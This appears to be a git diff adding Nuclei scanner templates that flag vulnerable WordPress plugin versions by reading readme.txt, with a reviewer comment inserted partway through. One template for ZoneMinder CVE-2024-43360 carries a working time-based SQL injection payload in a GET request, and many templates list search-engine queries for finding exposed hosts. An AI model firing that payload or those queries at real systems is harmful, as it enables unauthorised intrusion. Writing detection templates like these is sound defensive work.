metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:CVE-2024-10079' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml b/poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml new file mode 100644 index 0000000000..1ee5db2403 --- /dev/null +++ b/poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Meta + author: topscoder + severity: low + description: > + The WP Easy Post Types plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10080 + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:CVE-2024-10080' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43360.yaml b/poc/cve/CVE-2024-43360.yaml new file mode 100644 index 0000000000..a8a0f98a75 --- /dev/null +++ b/poc/cve/CVE-2024-43360.yaml 
@@ -0,0 +1,31 @@
+id: CVE-2024-43360
+
+info:
+ name: ZoneMinder time based sql injection detection
+ author: securitytaters
+ severity: Critical
+ description: |
+ Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability.
+ reference:
+ - http://
+ tags: cve2024,cve,zoneminder,sqli
+
+variables:
+ username: ''
+
+http:
+ - raw:
+ - |
+ @timeout: 20s
+ GET /index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=14'
+ - 'status_code == 200'
+ - 'contains_all(body,"{\"result\":\"Ok\",\"rows\":[")'
+ - 'contains_all(content_type,"application/json")'
+ condition: and
diff --git a/poc/cve/CVE-2024-48020.yaml b/poc/cve/CVE-2024-48020.yaml
new file mode 100644
index 0000000000..727574a5ae
--- /dev/null
+++ b/poc/cve/CVE-2024-48020.yaml
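Review bot: The only timing evidence is a single request checked with `duration>=14`, so a slow or overloaded host that returns the normal JSON body after 14 seconds would match as well and produce a false positive at critical severity. The template needs a second data point, such as an undelayed baseline request compared against the delayed one, before the finding can be trusted. The metadata is also unfinished: `reference` holds the stub `- http://`, there is no `classification` block although the `id` already names the CVE, and `variables: username: ''` is not used anywhere in the request. `severity: Critical` is capitalised where the other templates in this diff use lowercase, so `severity: critical` would keep them consistent.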
@@ -0,0 +1,59 @@ +id: CVE-2024-48020 + +info: + name: > + Backup and Staging by WP Time Capsule <= 1.22.21 - Authenticated (Contributor+) SQL Injection + author: topscoder + severity: low + description: > + The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.22.21 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/912523ae-f619-46af-83b9-e9fca81bd5b0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-48020 + metadata: + fofa-query: "wp-content/plugins/wp-time-capsule/" + google-query: inurl:"/wp-content/plugins/wp-time-capsule/" + shodan-query: 'vuln:CVE-2024-48020' + tags: cve,wordpress,wp-plugin,wp-time-capsule,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-time-capsule/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-time-capsule" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.22.21') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48021.yaml b/poc/cve/CVE-2024-48021.yaml new file mode 100644 index 0000000000..3b454adb59 --- /dev/null +++ b/poc/cve/CVE-2024-48021.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48021 + +info: + name: > + Contact Form 7 – PayPal & Stripe Add-on <= 2.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Contact Form 7 – PayPal & Stripe Add-on plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25a9fd76-15aa-43f9-bb11-9825b847a4e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-48021 + metadata: + fofa-query: "wp-content/plugins/contact-form-7-paypal-add-on/" + google-query: inurl:"/wp-content/plugins/contact-form-7-paypal-add-on/" + shodan-query: 'vuln:CVE-2024-48021' + tags: cve,wordpress,wp-plugin,contact-form-7-paypal-add-on,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-7-paypal-add-on/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contact-form-7-paypal-add-on" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48022.yaml b/poc/cve/CVE-2024-48022.yaml new file mode 100644 index 0000000000..c339345a2a --- /dev/null +++ b/poc/cve/CVE-2024-48022.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48022 + +info: + name: > + Shortcode For Elementor Templates <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Shortcode For Elementor Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5a3b416-4434-456e-91c7-24f874e8f959?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-48022 + metadata: + fofa-query: "wp-content/plugins/shortcode-support-for-elementor-templates/" + google-query: inurl:"/wp-content/plugins/shortcode-support-for-elementor-templates/" + shodan-query: 'vuln:CVE-2024-48022' + tags: cve,wordpress,wp-plugin,shortcode-support-for-elementor-templates,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shortcode-support-for-elementor-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shortcode-support-for-elementor-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48023.yaml b/poc/cve/CVE-2024-48023.yaml new file mode 100644 index 0000000000..f9cdc46570 --- /dev/null 
+++ b/poc/cve/CVE-2024-48023.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48023 + +info: + name: > + Restaurant Reservations Widget <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Restaurant Reservations Widget plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e08c0e74-4ce0-4278-8f58-909f7c24f346?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-48023 + metadata: + fofa-query: "wp-content/plugins/restaurantconnect-reswidget/" + google-query: inurl:"/wp-content/plugins/restaurantconnect-reswidget/" + shodan-query: 'vuln:CVE-2024-48023' + tags: cve,wordpress,wp-plugin,restaurantconnect-reswidget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/restaurantconnect-reswidget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "restaurantconnect-reswidget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48024.yaml b/poc/cve/CVE-2024-48024.yaml new file mode 100644 index 0000000000..0efe645d03 --- /dev/null +++ b/poc/cve/CVE-2024-48024.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48024 + +info: + name: > + Keep Backup Daily <= 2.0.7 - Unauthenticated Information Disclosure + author: topscoder + severity: medium + description: > + The Keep Backup Daily plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.7. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b007bf9-9756-4f18-81b9-7d4b15c5dca8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-48024 + metadata: + fofa-query: "wp-content/plugins/keep-backup-daily/" + google-query: inurl:"/wp-content/plugins/keep-backup-daily/" + shodan-query: 'vuln:CVE-2024-48024' + tags: cve,wordpress,wp-plugin,keep-backup-daily,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/keep-backup-daily/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "keep-backup-daily" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48025.yaml b/poc/cve/CVE-2024-48025.yaml new file mode 100644 index 0000000000..49d6a3dacc --- /dev/null +++ b/poc/cve/CVE-2024-48025.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48025 + +info: + name: > + Simple Baseball Scoreboard <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Simple Baseball Scoreboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0519d77a-2fbd-48d5-bc2b-9efb84f9e559?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-48025 + metadata: + fofa-query: "wp-content/plugins/simple-baseball-scoreboard/" + google-query: inurl:"/wp-content/plugins/simple-baseball-scoreboard/" + shodan-query: 'vuln:CVE-2024-48025' + tags: cve,wordpress,wp-plugin,simple-baseball-scoreboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-baseball-scoreboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-baseball-scoreboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48026.yaml b/poc/cve/CVE-2024-48026.yaml new file mode 100644 index 0000000000..544eb4a12f --- /dev/null +++ b/poc/cve/CVE-2024-48026.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48026 + +info: + name: > + Disc Golf Manager <= 1.0.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Disc Golf Manager plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.0.0 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cf85ddc7-cb90-4502-9936-f2c51030b4a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48026 + metadata: + fofa-query: "wp-content/plugins/disc-golf-manager/" + google-query: inurl:"/wp-content/plugins/disc-golf-manager/" + shodan-query: 'vuln:CVE-2024-48026' + tags: cve,wordpress,wp-plugin,disc-golf-manager,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/disc-golf-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "disc-golf-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48027.yaml b/poc/cve/CVE-2024-48027.yaml new file mode 100644 index 0000000000..e99ba97db8 --- /dev/null +++ b/poc/cve/CVE-2024-48027.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48027 + +info: + name: > + External featured image from bing <= 1.0.2 - Authenticated (Subscriber+) Remote Code Execution + author: topscoder + severity: low + description: > + The External featured image from bing plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute code on the server. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22d5a45b-41bd-4f65-b8b7-d7efb2b9cecf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48027 + metadata: + fofa-query: "wp-content/plugins/external-featured-image-from-bing/" + google-query: inurl:"/wp-content/plugins/external-featured-image-from-bing/" + shodan-query: 'vuln:CVE-2024-48027' + tags: cve,wordpress,wp-plugin,external-featured-image-from-bing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/external-featured-image-from-bing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "external-featured-image-from-bing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48028.yaml b/poc/cve/CVE-2024-48028.yaml new file mode 100644 index 0000000000..f46b8fa2cc --- /dev/null +++ b/poc/cve/CVE-2024-48028.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48028 + +info: + name: > + IP Loc8 <= 1.1 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The IP Loc8 plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/24092cd1-cf89-49c1-a607-4d5d06d0c804?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48028 + metadata: + fofa-query: "wp-content/plugins/ip-loc8/" + google-query: inurl:"/wp-content/plugins/ip-loc8/" + shodan-query: 'vuln:CVE-2024-48028' + tags: cve,wordpress,wp-plugin,ip-loc8,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ip-loc8/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ip-loc8" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48029.yaml b/poc/cve/CVE-2024-48029.yaml new file mode 100644 index 0000000000..3d0e05a8d8 --- /dev/null +++ b/poc/cve/CVE-2024-48029.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48029 + +info: + name: > + SB Random Posts Widget <= 1.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The SB Random Posts Widget plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.0. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6fbf684-8651-484d-9459-ed11d6d9008f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-48029 + metadata: + fofa-query: "wp-content/plugins/sb-random-posts-widget/" + google-query: inurl:"/wp-content/plugins/sb-random-posts-widget/" + shodan-query: 'vuln:CVE-2024-48029' + tags: cve,wordpress,wp-plugin,sb-random-posts-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sb-random-posts-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sb-random-posts-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48030.yaml b/poc/cve/CVE-2024-48030.yaml new file mode 100644 index 0000000000..3b95831502 --- /dev/null 
+++ b/poc/cve/CVE-2024-48030.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48030 + +info: + name: > + Telecash Ricaricaweb <= 2.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Telecash Ricaricaweb plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fa6998-b85a-413e-be00-81926b4ea6ab?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48030 + metadata: + fofa-query: "wp-content/plugins/telecash-ricaricaweb/" + google-query: inurl:"/wp-content/plugins/telecash-ricaricaweb/" + shodan-query: 'vuln:CVE-2024-48030' + tags: cve,wordpress,wp-plugin,telecash-ricaricaweb,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/telecash-ricaricaweb/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "telecash-ricaricaweb" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48031.yaml b/poc/cve/CVE-2024-48031.yaml new file mode 100644 index 0000000000..d206c538a9 --- /dev/null 
+++ b/poc/cve/CVE-2024-48031.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-48031 + +info: + name: > + Featured Posts with Multiple Custom Groups (FPMCG) <= 4.0 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Featured Posts with Multiple Custom Groups (FPMCG) plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05ebdcca-ef90-4bbd-ac5e-05f57bf0c7d7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-48031 + metadata: + fofa-query: "wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + google-query: inurl:"/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + shodan-query: 'vuln:CVE-2024-48031' + tags: cve,wordpress,wp-plugin,featured-posts-with-multiple-custom-groups-fpmcg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-with-multiple-custom-groups-fpmcg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-48032.yaml b/poc/cve/CVE-2024-48032.yaml new file mode 100644 index 0000000000..fe8c071867 --- /dev/null +++ b/poc/cve/CVE-2024-48032.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48032 + +info: + name: > + Featured Posts with Multiple Custom Groups (FPMCG) <= 4.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Featured Posts with Multiple Custom Groups (FPMCG) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bc6fce33-af42-466e-8e76-1e027d5d52ec?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-48032 + metadata: + fofa-query: "wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + google-query: inurl:"/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/" + shodan-query: 'vuln:CVE-2024-48032' + tags: cve,wordpress,wp-plugin,featured-posts-with-multiple-custom-groups-fpmcg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/featured-posts-with-multiple-custom-groups-fpmcg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "featured-posts-with-multiple-custom-groups-fpmcg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-48033.yaml b/poc/cve/CVE-2024-48033.yaml new file mode 100644 index 0000000000..32b12d73f4 --- /dev/null +++ b/poc/cve/CVE-2024-48033.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-48033 + +info: + name: > + Talkback <= 1.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + The Talkback plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.0 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94fdc98a-c8be-47b4-a0a2-02d7373ab85e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-48033 + metadata: + fofa-query: "wp-content/plugins/talkback-secure-linkback-protocol/" + google-query: inurl:"/wp-content/plugins/talkback-secure-linkback-protocol/" + shodan-query: 'vuln:CVE-2024-48033' + tags: cve,wordpress,wp-plugin,talkback-secure-linkback-protocol,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/talkback-secure-linkback-protocol/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "talkback-secure-linkback-protocol" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-48034.yaml b/poc/cve/CVE-2024-48034.yaml new file mode 100644 index 0000000000..29b2350098 --- /dev/null 
